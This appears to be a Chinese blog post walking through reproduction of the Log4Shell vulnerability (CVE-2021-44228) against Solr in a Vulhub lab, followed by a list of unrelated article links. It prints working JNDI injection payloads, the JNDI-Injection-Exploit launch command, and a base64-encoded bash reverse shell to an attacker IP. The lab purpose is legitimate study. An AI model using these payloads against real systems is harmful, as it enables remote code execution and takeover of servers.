当前位置: 首页 > news >正文

利用Vulhub复现log4j漏洞CVE-2021-44228

利用Vulhub复现log4j漏洞CVE-2021-44228

  • 利用Vulhub搭建好log4j漏洞靶场然后
  • 得到网站:

    在这里插入图片描述

    找到漏洞利用点:

    solr/admin/cores?action=

    在这里插入图片描述
    可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测

    利用

    ?action=${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
    

    进行检测

    漏洞利用:

    利用工具JNDI-Injection-Exploit搭建服务:格式:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "ip(攻击机)"  
    

    这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。

    接下来要实现反弹shell,可以用命令

    bash -i >& /dev/tcp/192.168.31.46/6666 0>&1
    

    base64进行编码的得到:

    在这里插入图片描述

    运行JNDI-Injection-Exploit搭建服务器:

     java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjQ2LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.31.46" 
    

    在这里插入图片描述

    监听6666端口:

    在这里插入图片描述

    在利用burpsuite发送playload:

    ${jndi:ldap://192.168.31.46:1389/rq989a}
    

    成功反弹shell:

    在这里插入图片描述

    参考博客:

    https://blog.csdn.net/god_001/article/details/124461938

相关文章:

  • 【学生网页设计作业源码】基于html+css保护海豚主题网页设计与制作(7页)
  • 频率响应说明
  • C++教程系列之-01-C++概述与NOIP案例
  • Network 之十四 email 通信架构、Postfix 部署详解
  • Tableau8——数据操作
  • python基础知识笔记
  • 基于FPGA的PID控制器设计
  • 程序设计与c语言笔记(一)
  • 【.Net实用方法总结】 整理并总结.NET 中的 System.IO.Pipelines(管道)
  • 深度学习10——卷积神经网络
  • Mybatis 实现原理
  • matplotlib入门
  • JavaScript设计模式——建造者模式
  • Roson的Qt之旅 #124 QNetworkConfigurationManager网络配置管理
  • 天池Python练习02-位运算
  • Angular 响应式表单之下拉框
  • Github访问慢解决办法
  • Java程序员幽默爆笑锦集
  • JS学习笔记——闭包
  • Mac 鼠须管 Rime 输入法 安装五笔输入法 教程
  • Mithril.js 入门介绍
  • Nacos系列:Nacos的Java SDK使用
  • REST架构的思考
  • Spring声明式事务管理之一:五大属性分析
  • 编写高质量JavaScript代码之并发
  • 配置 PM2 实现代码自动发布
  • 前端 CSS : 5# 纯 CSS 实现24小时超市
  • 异常机制详解
  • 职业生涯 一个六年开发经验的女程序员的心声。
  • ionic异常记录
  • ​Kaggle X光肺炎检测比赛第二名方案解析 | CVPR 2020 Workshop
  • #【QT 5 调试软件后,发布相关:软件生成exe文件 + 文件打包】
  • (39)STM32——FLASH闪存
  • (DFS + 剪枝)【洛谷P1731】 [NOI1999] 生日蛋糕
  • (function(){})()的分步解析
  • (ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY)讲解
  • (附源码)spring boot球鞋文化交流论坛 毕业设计 141436
  • (附源码)spring boot智能服药提醒app 毕业设计 102151
  • (三分钟)速览传统边缘检测算子
  • (新)网络工程师考点串讲与真题详解
  • (转)真正的中国天气api接口xml,json(求加精) ...
  • ***测试-HTTP方法
  • ..thread“main“ com.fasterxml.jackson.databind.JsonMappingException: Jackson version is too old 2.3.1
  • .NET 8.0 发布到 IIS
  • .NET CORE 第一节 创建基本的 asp.net core
  • .NET 事件模型教程(二)
  • .net安装_还在用第三方安装.NET?Win10自带.NET3.5安装
  • .NET实现之(自动更新)
  • .NET中统一的存储过程调用方法(收藏)
  • //解决validator验证插件多个name相同只验证第一的问题
  • /dev/VolGroup00/LogVol00:unexpected inconsistency;run fsck manually
  • /dev下添加设备节点的方法步骤(通过device_create)
  • ??在JSP中,java和JavaScript如何交互?
  • @Autowired注解的实现原理
  • @Bean, @Component, @Configuration简析